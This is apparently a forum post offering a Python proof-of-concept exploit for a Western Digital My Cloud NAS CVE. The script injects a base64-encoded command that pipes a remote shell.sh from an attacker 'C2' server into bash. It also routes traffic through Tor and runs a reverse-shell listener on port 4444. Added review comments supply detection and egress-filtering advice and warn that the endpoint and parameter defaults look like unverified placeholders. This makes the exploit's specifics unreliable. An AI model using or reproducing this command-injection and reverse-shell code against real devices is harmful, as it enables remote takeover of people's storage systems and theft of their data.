
Western Digital MyCloud Nas CVE-2025-30247

reg

HDD-drive
Here is some of my code you can use:



Код:
#!/usr/bin/env python3
import requests
import base64
import argparse
import sys
import socket
import threading
import time
from urllib.parse import quote

# Parse command-line arguments
# NOTE(review): the --endpoint and --param defaults ("/api/v1/settings", "param1")
# read like generic placeholders. Nothing on this page shows that they match the
# code path affected by CVE-2025-30247, so treat this script as an unverified
# template and rely on the vendor advisory for affected components and fixes.
parser = argparse.ArgumentParser(description="CVE-2025-30247 PoC Exploit for Western Digital My Cloud NAS")
parser.add_argument("target", help="Target URL (e.g., http://192.168.1.100)")
parser.add_argument("--port", default=80, type=int, help="Target port (default: 80)")
parser.add_argument("--endpoint", default="/api/v1/settings", help="Vulnerable endpoint (e.g., /api/v1/settings)")
parser.add_argument("--param", default="param1", help="Vulnerable parameter (e.g., param1)")
parser.add_argument("--c2", default="http://<your_server>:80", help="C2 server URL for payload")
parser.add_argument("--lhost", default="<your_ip>", help="Listener IP for reverse shell")
parser.add_argument("--lport", default=4444, type=int, help="Listener port for reverse shell")
parser.add_argument("--tor", action="store_true", help="Route traffic through Tor")
args = parser.parse_args()

# Payload to download and execute reverse shell
# Inner stage: a downloader that pipes a remote shell.sh into bash. The contents
# of shell.sh are not shown on this page.
payload = f";curl -s {args.c2}/shell.sh | bash"
encoded_payload = base64.b64encode(payload.encode()).decode()

# Craft POST data
# Outer stage: one form field whose value decodes the base64 blob and pipes it
# to bash. Detection note: requests form-encodes this dict, so the body arrives
# URL-encoded; match on the decoded body for a form value that starts with ';'
# and contains "base64 -d" followed by "| bash". On the device side, look for
# base64/bash/curl child processes of the web service and for an outbound HTTP
# fetch of /shell.sh.
data = {args.param: f";echo {encoded_payload} | base64 -d | bash"}

# Headers to mimic legitimate request
# The User-Agent is a fixed desktop Chrome 91 string. It is trivially changed,
# so it is only a weak indicator; key detections on the request body instead.
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
    "Content-Type": "application/x-www-form-urlencoded",
    "Accept": "*/*"
}

# Tor proxy setup
# With --tor, both schemes go through a local SOCKS proxy on 127.0.0.1:9050
# ("socks5h" also resolves hostnames through the proxy). The source address in
# the device's logs is then the proxy exit, so source-IP blocking or attribution
# is unreliable; patching and not exposing the management interface are the
# durable mitigations.
proxies = {"http": "socks5h://127.0.0.1:9050", "https": "socks5h://127.0.0.1:9050"} if args.tor else {}

# Send exploit
def send_exploit():
    """POST the module-level form data to the target and print the outcome.

    The URL is the concatenation of args.target, args.port and args.endpoint.
    The first 200 characters of the response body are printed. Any exception
    is printed and the process exits with status 1.

    NOTE(review): an HTTP 200 only shows that the server answered the request.
    It does not show that any command ran, so the "[+]" message below is not
    evidence that a device is vulnerable or compromised.
    """
    url = f"{args.target}:{args.port}{args.endpoint}"
    try:
        print(f"[*] Sending payload to {url}")
        # verify=False disables TLS certificate validation for https targets.
        response = requests.post(url, data=data, headers=headers, proxies=proxies, timeout=10, verify=False)
        print(f"[*] Response: {response.status_code}\n{response.text[:200]}")
        if response.status_code == 200:
            print(f"[+] Payload sent successfully. Check listener: nc -lvnp {args.lport}")
        else:
            print(f"[!] Unexpected response code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")
        sys.exit(1)

# Simple listener to confirm shell (optional, for testing)
def start_listener():
    """Accept one TCP connection on args.lhost:args.lport and print what it sends.

    After accepting, the loop repeatedly writes "whoami\\n" to the peer and
    prints up to 1024 bytes of each reply until the peer closes the connection.
    Any exception is printed and the function returns.

    NOTE(review): from the defender's side this corresponds to an outbound TCP
    session initiated by the storage device to an arbitrary host and port
    (4444 by default here). Egress filtering that denies outbound connections
    initiated by NAS appliances, plus alerting on such flows, covers this stage
    regardless of how the request stage is delivered.
    """
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind((args.lhost, args.lport))
        s.listen(1)
        print(f"[*] Listener started on {args.lhost}:{args.lport}")
        # Blocks until a single peer connects.
        conn, addr = s.accept()
        print(f"[+] Connection from {addr}")
        while True:
            conn.send(b"whoami\n")
            # This local name is distinct from the module-level form dict.
            data = conn.recv(1024).decode()
            if not data:
                break
            print(f"[*] Received: {data.strip()}")
        conn.close()
    except Exception as e:
        print(f"[!] Listener error: {e}")

if __name__ == "__main__":
    # Start listener in a separate thread
    # The thread is non-daemon, so the process stays alive while accept() blocks.
    listener_thread = threading.Thread(target=start_listener)
    listener_thread.start()
   
    # Wait briefly to ensure listener is up
    # A fixed one-second sleep; there is no check that the bind succeeded.
    time.sleep(1)
   
    # Send exploit
    send_exploit()
   
    # Keep listener running
    # Blocks until start_listener returns.
    listener_thread.join()
 

